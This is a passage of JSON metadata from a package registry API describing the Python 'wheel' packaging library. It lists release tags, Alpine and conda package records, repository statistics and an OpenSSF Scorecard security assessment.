epositories/pypa%2Fwheel/tags/0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.23.0/manifests"},{"name":"0.22.0","sha":"f1cc0b8a8601040b864e1e784e160744c7e3d965","kind":"commit","published_at":"2013-09-15T20:45:04.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.22.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.22.0/manifests"},{"name":"0.21.0","sha":"474826f4d64064e852b541f099fa69dcf5dd20fa","kind":"commit","published_at":"2013-07-20T16:19:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.21.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.21.0/manifests"},{"name":"0.16.0","sha":"f65ab72e2c6b04d10a4153807f473c9e9af421d5","kind":"commit","published_at":"2013-04-30T01:46:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.16.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.16.0/manifests"},{"name":"0.15.0","sha":"dffddb1d5af9e736fdd6192ca9256dc767bfab51","kind":"commit","published_at":"2012-11-16T14:06:00.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.15.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.15.0/manifests"},{"name":"0.13.0","sha":"60fa189589155e43f33587f67eb44bb4fd7d5b58","kind":"commit","published_at":"2012-10-18T00:16:05.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.13.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.13.0/manifests"},{"name":"0.12.0","sha":"2861596953a6ddfb2c4f052a46a2e2b4c5619245","kind":"commit","published_at":"2012-10-06T12:34:19.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.12.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.12.0/manifests"},{"name":"0.11.0","sha":"8dd29d841e15596bc9b5d1c7f7576b2a66113f92","kind":"commit","published_at":"2012-10-06T12:18:46.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.11.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.11.0/manifests"},{"name":"0.10.3","sha":"7021b0ee2a51e5d9447d06038db58e9e597625f7","kind":"commit","published_at":"2012-10-03T22:55:11.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.3/manifests"},{"name":"0.10.2","sha":"126aaacc9f24fa69b6b74d4e742f645f6bb65cf3","kind":"commit","published_at":"2012-10-03T01:11:35.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.2/manifests"},{"name":"0.10.1","sha":"92e52e6745ec6b1178c2f42585c2f37ab04902a8","kind":"commit","published_at":"2012-10-01T02:52:13.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.1/manifests"},{"name":"0.10.0","sha":"9ee6da6d6cab3fa171f2704df5f934474acc4aae","kind":"commit","published_at":"2012-10-01T02:20:04.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.0/manifests"},{"name":"0.9.7","sha":"a118f5845570ebaf6566b8075dc1dcaf117d7d43","kind":"commit","published_at":"2012-09-20T15:52:36.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.7","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.7/manifests"},{"name":"0.9.6","sha":"0c4752551e4fa1d4e9786fc874ae97edf52c0369","kind":"commit","published_at":"2012-09-20T01:46:26.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.6","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.6/manifests"},{"name":"0.9.4","sha":"8db2d0d4760a0886998e3fca4206f5db3230d223","kind":"commit","published_at":"2012-09-11T12:32:56.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.4","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.4/manifests"},{"name":"0.9.3","sha":"ca65be72feaf5ebe92ef4c9e91bd722360c1ad2c","kind":"commit","published_at":"2012-09-11T02:38:10.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.3/manifests"},{"name":"0.9.1","sha":"6952bc635deb0afdf36c5f325aa166636f1c2a52","kind":"commit","published_at":"2012-08-28T23:07:55.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.1/manifests"},{"name":"0.9","sha":"49b1d5dac1cdeaf98998b1e5bdb0e2cf134edff3","kind":"commit","published_at":"2012-08-23T03:08:13.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9","html_url":"https://github.com/pypa/wheel/releases/tag/0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9/manifests"},{"name":"0.7","sha":"b2930f5f5d3c898389bdbdd7c854a0b9d320cf14","kind":"commit","published_at":"2012-07-28T12:12:45.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.7","html_url":"https://github.com/pypa/wheel/releases/tag/0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.7/manifests"},{"name":"0.6","sha":"bdf9d5747a724664bd3588ab471907a900b45c9a","kind":"commit","published_at":"2012-07-23T16:26:11.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.6","html_url":"https://github.com/pypa/wheel/releases/tag/0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.6/manifests"},{"name":"0.5","sha":"d02f91dceda7c4a16cc26ea80f0eecfff638e4b2","kind":"commit","published_at":"2012-07-17T16:23:12.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.5","html_url":"https://github.com/pypa/wheel/releases/tag/0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.5/manifests"}]},"repo_metadata_updated_at":"2025-10-30T04:12:26.085Z","dependent_packages_count":1,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":21.468306824414324,"stargazers_count":6.918436104364177,"forks_count":5.829350466191334,"average":8.554023348742458},"purl":"pkg:apk/alpine/py3-wheel?arch=x86_64\u0026repository_url=https://pkgs.alpinelinux.org/packages?branch=v3.12","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/alpine/py3-wheel","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/alpine/py3-wheel","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/alpine/py3-wheel/dependencies","status":null,"funding_links":["https://github.com/sponsors/pypa"],"critical":null,"issue_metadata":{"last_synced_at":"2025-10-26T09:45:16.065Z","issues_count":109,"pull_requests_count":184,"avg_time_to_close_issue":48693272.43877551,"avg_time_to_close_pull_request":2636588.9515151517,"issues_closed_count":98,"pull_requests_closed_count":165,"pull_request_authors_count":37,"issue_authors_count":90,"avg_comments_per_issue":5.908256880733945,"avg_comments_per_pull_request":3.5217391304347827,"merged_pull_requests_count":140,"bot_issues_count":0,"bot_pull_requests_count":65,"past_year_issues_count":16,"past_year_pull_requests_count":34,"past_year_avg_time_to_close_issue":238596.63636363635,"past_year_avg_time_to_close_pull_request":890483.8846153846,"past_year_issues_closed_count":11,"past_year_pull_requests_closed_count":26,"past_year_pull_request_authors_count":11,"past_year_issue_authors_count":15,"past_year_avg_comments_per_issue":4.25,"past_year_avg_comments_per_pull_request":3.0588235294117645,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":8,"past_year_merged_pull_requests_count":23,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/issues","maintainers":[{"login":"jaraco","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jaraco"},{"login":"woodruffw","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/woodruffw"},{"login":"di","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/di"},{"login":"uranusjr","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/uranusjr"},{"login":"pradyunsg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pradyunsg"},{"login":"mayeut","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mayeut"},{"login":"alex","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alex"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.12/packages/py3-wheel/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.12/packages/py3-wheel/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.12/packages/py3-wheel/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.12/packages/py3-wheel/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.12/packages/py3-wheel/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.12/packages/py3-wheel/codemeta","maintainers":[{"uuid":"antoine.fontaine@epfl.ch","login":null,"name":"Antoine Fontaine","email":null,"url":"https://pkgs.alpinelinux.org/packages?maintainer=Antoine Fontaine","packages_count":5,"html_url":"https://pkgs.alpinelinux.org/packages?maintainer=Antoine Fontaine","role":null,"created_at":"2023-02-07T16:56:09.187Z","updated_at":"2023-02-07T16:56:09.187Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.12/maintainers/antoine.fontaine@epfl.ch/packages"}],"registry":{"name":"alpine-v3.12","url":"https://pkgs.alpinelinux.org/packages?branch=v3.12","ecosystem":"alpine","default":false,"packages_count":12763,"maintainers_count":216,"namespaces_count":2,"keywords_count":1443,"github":"alpinelinux","metadata":{"repos":["main","community"],"funded_packages_count":482},"icon_url":"https://github.com/alpinelinux.png","created_at":"2023-01-31T17:27:50.748Z","updated_at":"2026-06-10T05:16:20.001Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.12/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.12/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.12/namespaces"}},{"id":5285018,"name":"wheel","ecosystem":"conda","description":"This library is the reference implementation of the Python wheel packaging standard, as defined in PEP 427. It has two different roles:   1. A setuptools extension for building wheels that provides the bdist_wheel setuptools command   2. A command line tool for working with wheel files","homepage":"https://github.com/pypa/wheel","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/pypa/wheel","keywords_array":[],"namespace":null,"versions_count":27,"first_release_published_at":"2017-09-20T23:06:11.000Z","latest_release_published_at":"2026-01-26T17:57:44.000Z","latest_release_number":"0.46.3","last_synced_at":"2026-04-13T21:03:19.192Z","created_at":"2022-10-03T15:41:53.108Z","updated_at":"2026-04-13T21:03:19.192Z","registry_url":"https://anaconda.org/anaconda/wheel","install_command":"conda install -c anaconda wheel","documentation_url":null,"metadata":{},"repo_metadata":{"id":23174547,"uuid":"98346885","full_name":"pypa/wheel","owner":"pypa","description":"The official binary distribution format for Python","archived":false,"fork":false,"pushed_at":"2025-10-06T19:13:50.000Z","size":1827,"stargazers_count":539,"open_issues_count":14,"forks_count":171,"subscribers_count":30,"default_branch":"main","last_synced_at":"2025-10-30T00:35:00.752Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/pypa.png","metadata":{"files":{"readme":"README.rst","changelog":null,"contributing":null,"funding":null,"license":"LICENSE.txt","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2017-07-25T20:24:25.000Z","updated_at":"2025-10-29T13:00:22.000Z","dependencies_parsed_at":"2024-02-03T11:27:24.404Z","dependency_job_id":"c444d7cc-5eb9-412d-b647-9474b7b4096f","html_url":"https://github.com/pypa/wheel","commit_stats":{"total_commits":913,"total_committers":82,"mean_commits":"11.134146341463415","dds":0.6297918948521358,"last_synced_commit":"baf6bf89562cb42a0ca71cc1e804600b161952eb"},"previous_names":[],"tags_count":68,"template":false,"template_full_name":null,"purl":"pkg:github/pypa/wheel","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pypa","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/sbom","scorecard":{"id":751706,"data":{"date":"2025-08-11","repo":{"name":"github.com/pypa/wheel","commit":"15b7577654e8bcd23e009c6bac036b65c11d8d8f"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5,"checks":[{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:39: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/publish.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:50: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/publish.yml:52: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/publish.yml:56: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:31: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:53: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/test.yml/main?enable=pin","Warn: pipCommand not pinned by hash: .github/workflows/publish.yml:23","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:41","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:43","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:46","Info:   0 out of   7 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   4 third-party GitHubAction dependencies pinned","Info:   0 out of   4 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Maintained","score":1,"reason":"1 commit(s) and 1 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Code-Review","score":2,"reason":"Found 8/27 approved changesets -- score normalized to 2","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/publish.yml:48","Warn: no topLevel permission defined: .github/workflows/publish.yml:1","Warn: no topLevel permission defined: .github/workflows/test.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Fuzzing","score":10,"reason":"project is fuzzed","details":["Info: OSSFuzz integration found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.txt:0","Info: FSF or OSI recognized license: MIT License: LICENSE.txt:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/publish.yml:31"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Branch-Protection","score":0,"reason":"branch protection not enabled on development/release branches","details":["Warn: branch protection not enabled for branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Security-Policy","score":0,"reason":"security policy file not detected","details":["Warn: no security policy file detected","Warn: no security file to analyze","Warn: no security file to analyze","Warn: no security file to analyze"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"SAST","score":5,"reason":"SAST tool is not run on all commits -- score normalized to 5","details":["Warn: 6 commits out of 12 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-22T20:33:25.724Z","repository_id":23174547,"created_at":"2025-08-22T20:33:25.724Z","updated_at":"2025-08-22T20:33:25.724Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":281742688,"owners_count":26553720,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-10-30T02:00:06.501Z","response_time":61,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"pypa","name":"Python Packaging Authority","uuid":"647025","kind":"organization","description":"","email":"info@pypa.io","website":"https://www.pypa.io","location":"United States of America","twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/647025?v=4","repositories_count":58,"last_synced_at":"2025-10-30T00:34:30.821Z","metadata":{"has_sponsors_listing":true},"html_url":"https://github.com/pypa","funding_links":["https://github.com/sponsors/pypa"],"total_stars":88807,"followers":2132,"following":0,"created_at":"2022-11-02T16:21:37.826Z","updated_at":"2025-10-30T00:34:30.821Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pypa","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pypa/repositories"},"tags":[{"name":"0.46.1","sha":"7a0ea7f7c3dd73747e37368bb074cd0d9fb49259","kind":"commit","published_at":"2025-04-08T20:53:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.46.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.46.1/manifests"},{"name":"0.46.0","sha":"1da658384bbfc14c091085bb98828e68368a1ed5","kind":"commit","published_at":"2025-04-03T09:39:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.46.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/p